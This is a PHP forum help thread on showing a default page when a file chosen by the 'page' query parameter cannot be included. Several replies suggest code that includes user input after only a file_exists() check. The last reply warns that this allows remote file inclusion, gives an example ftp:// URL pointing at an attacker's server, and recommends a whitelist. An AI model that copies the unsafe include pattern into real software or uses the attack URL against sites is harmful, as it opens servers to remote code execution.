[SOLVED] how to prevent this:

[aebstract]

Warning: Failed opening 'order.php' for inclusion (include_path='.:/php/includes:/usr/share/php') in /home/virtual/site130/fst/var/www/html/2/index.php on line 15

 

 

This is what gets displayed at the top of the page whenever the page doesn't exist (meaning it cannot include the file). How can I have a default page that displays simply saying "Page does not exist" if this comes up?

[monkeytooth]

.htaccess for custom 404 errors.. if you have access to .htaccess on your host.

[rajivgonsalves]

you should

 

if (file_exists("order.php"))
{
    include("order.php");
}
else
{
    echo "Page does not exist";
}

[obsidian]

Hopefully, you are never trying to include a page that you are not absolutely certain exists in the first place. If you are having to handle an include via logic, it suggests that you may be taking user input to include a page. This really isn't very good practice. At the same time, it's not the best idea to be advertising to your user when something on your script isn't working, either. Since that's just a warning, you could always just turn off notices and warnings (or error reporting entirely) on the production site, and that would save you some trouble.

[aebstract]

To obsidian, the reason why I am wanting to fix this up a little bit (and maybe just redirect them to the home page versus a warning page) is because it is possible that someone just types in to the url. That would force the error and look bad. I'll try out what rajiv said.

[aebstract]

I'm trying something like this:

 

if (isset($_GET['page']) && !file_exists($_GET['page'].php)) {
$page = ($_GET['page']);
} else {
$page = "home";
}

 

Not quite working, something off a little?

[kenrbnsn]

You want to be testing to see if the file exists, not if the file doesn't exist.

 

Try:

<?php
$page = (isset($_GET['page']) && file_exists($_GET['page'] . '.php'))?$_GET['page']:'home';
?>

 

Ken

[haku]

It depends on what you are trying to achieve. For the most part, your function is syntaxically (just made that word up) correct. But depending on what you are trying to do, you may have a logic error. What is not working right?

[laffin]

I used something like this in another post

$page = (!is_null($page = 
isset($_GET['page'])?(preg_match("@[^/.\s]@",$_GET['page'])?(file_exists($_GET['page'].'html')?$_GET['page']:null):null):null)
?$page:"home") . ".html";

 

the preg_match just prevents users using . or / in the page reference.

[PFMaBiSmAd]

In case this thread is read after being solved.

 

I am glad that you added validation - file_exists(), because your old code would have allowed someone to execute their unparsed php code on your server through the include() statement (if your server allowed allow_url_fopen(php4) or allow_url_include(php5).)

 

Unfortunately, file_exists() on php5 works for ftp:// addresses, so someone could cause your page to include() raw/unparsed php code from their server by using -

 

yourdomain.com/yourpage.php?page=ftp://theirdomain.com/theirpath/theirpage (without the .php ending, because your code adds it.)

 

I strongly recommend that you create an array of allowed page values and explicitly test $_GET['page'] against that array using the in_array() function.